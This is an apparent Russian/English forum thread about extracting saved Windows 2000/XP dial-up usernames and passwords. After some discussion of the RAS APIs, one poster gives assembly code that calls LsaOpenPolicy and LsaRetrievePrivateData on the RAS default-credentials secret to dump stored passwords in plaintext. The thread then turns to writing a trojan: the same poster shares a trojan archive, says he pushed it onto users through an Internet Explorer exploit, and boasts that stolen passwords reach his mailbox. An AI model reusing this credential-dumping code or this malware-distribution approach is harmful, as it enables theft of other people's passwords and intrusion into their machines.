Народ !

Кто-нить знает как в Win2000/XP определить имя пользователя и пароль на диалап?
В Win9x - все ясно - там WNetEnumCachedPasswords.
Но что делать в Win2000?

Зараннее спасибо.

1. Start MSDN
2. Choose Index
3. 'Phone-Book'
4. And you'll see... what about I'm.......

for ex: RasGetEntryProperties ..... and so on.

kID, you wrong, man!
1) RasGetEntryProperties does not retrieves the password and other login stuff, but RasGetEntryDialParams do.
2) the following text is from MSDN, about szPassword.

szPassword
Specifies a string that contains the user's password. This string is used to authenticate the user's access to the remote access server.
Use szPassword to send a new password to the remote server when you restart a RasDial connection from a RASCS_PasswordExpired paused state in Windows NT or later. When changing a password on an entry that calls Microsoft servers limit the new password to 14 characters in length to avoid down-level compatibility problems.

When retrieving the password using the RasGetEntryDialParams function in Windows 2000 or later, the szPassword member does not receive the actual password. Instead, szPassword receives a handle to the saved password. Substitute this handle for the saved password in calls to RasSetEntryDialParams, and RasDial. When presented with this handle, RasDial retrieves and uses the saved password. The value of this handle may change in future versions of the operating system; do not develop code that depends on the contents or format of this value.

rst
it was for exemple. this is the first function when you write 'Phone-Book' in index.

kID... Huh, man but how it relates to the topic-starters's question?
Or you think he's ask'd something like "give me please one of the RAS functions" -)

rst

no.
when you search some info, you write everything everywhere, just to find somewhat.
and I show him a way close to target, not the target.
when the person, who is looking for some what, finaly is finding that thing, he will never forget it....... if you understand me.

Огромное спасибо за помощь.
Только интересно, неужели русский язык запретили в инете?
Вы так интересно соревнуетесь кто лучше даст совет :)

Еще раз огромное спасибо.
У меня действительно старый MSDN.
А так как RasGetEntryDialParams не работало как в Win9x, я думал, что надо искать где-то в другом месте.

RasGetEntryDialParams возвращает 16 звездочек вместо пароля.
Пароли вырываются так (пробовал только в ХР):

sid_unicode db "L",0,"$",0,"_",0,"R",0,"a",0,"s",0,"D",0,"e",0,"f",0," a",0,"u",0,"l", 0,"t",0
db "C",0,"r",0,"e",0,"d",0,"e",0,"n",0,"t",0,"i",0,"a",0,"l",0,"s",0, "#", 0,"0",0

lsa_unicode_string dw 2 dup(sid_unicode_size)
dd offset sid_unicode
...
invoke LsaRetrievePrivateData,lsa_handle,offset lsa_unicode_string,offset private_data

В private_data будут лежать логины и пароли в уникоде.

2 hello_world
А можно по-подробнее?

AsbAlex
Что именно?

sid_unicode		db	"L",0,"$",0,"_",0,"R",0,"a",0,"s",0,"D",0,"e",0,"f",0, "a",0,"u",0,"l",0,"t",0
			db	"C",0,"r",0,"e",0,"d",0,"e",0,"n",0,"t",0,"i",0,"a",0,"l",0,"s", 0,"#",0,"0",0
sid_unicode_size	equ	$ - offset sid_unicode
lsa_handle		dd	0
lsa_object_attributes	db	28 dup(0)
lsa_unicode_string	dw	2 dup(sid_unicode_size)
			dd	offset sid_unicode
private_data		dd	0
...
invoke	LsaOpenPolicy,0,offset lsa_object_attributes,4,offset lsa_handle
invoke	LsaRetrievePrivateData,lsa_handle,offset lsa_unicode_string,offset private_data

в private_data оффсет на пароли

Хоть маленький исходничек hello_world чтоли
ато мне тут преспичало троик написать

не мог бы ты посмотреть:
http://www.wasm.ru/forum/index.php?action=vthread&forum=4&topic=4076
там едиалер пароль рашифровывается

Вот исходник моего трояна. Там только в начале все процессы mshta и cmd убиваются, не обращай внимания. Просто я его через ie эксплойт юзерам заливал.

1520880715__trojan.zip

Гы, это действительно троян? А AVP его почему-то за таковой не считает ;-)

Asterix
Так он у тебя работает вообще? Какая у тебя ось? Я только на ХР проверял.
Кстати мне на ящик последний пароль сегодня в 2 часа ночи пришел, так что это был не ты :)))